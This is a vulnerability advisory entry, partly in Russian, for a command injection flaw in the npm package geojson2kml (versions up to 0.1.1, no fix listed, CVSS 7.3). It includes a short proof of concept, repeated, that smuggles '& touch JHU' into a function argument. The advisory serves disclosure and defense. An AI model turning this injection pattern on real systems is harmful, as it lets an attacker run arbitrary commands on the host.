Описание
Command Injection in geojson2kml
All versions up to and including version 0.1.1 of package geojson2kml are vulnerable to Command Injection via the index.js file.
PoC:
var a =require("geojson2kml");
a("./","& touch JHU",function(){})
Пакеты
Наименование
geojson2kml
npm
Затронутые версииВерсия исправления
<= 0.1.1
Отсутствует
Связанные уязвимости
CVSS3: 7.3
nvd
почти 5 лет назад
All versions of package geojson2kml are vulnerable to Command Injection via the index.js file. PoC: var a =require("geojson2kml"); a("./","& touch JHU",function(){})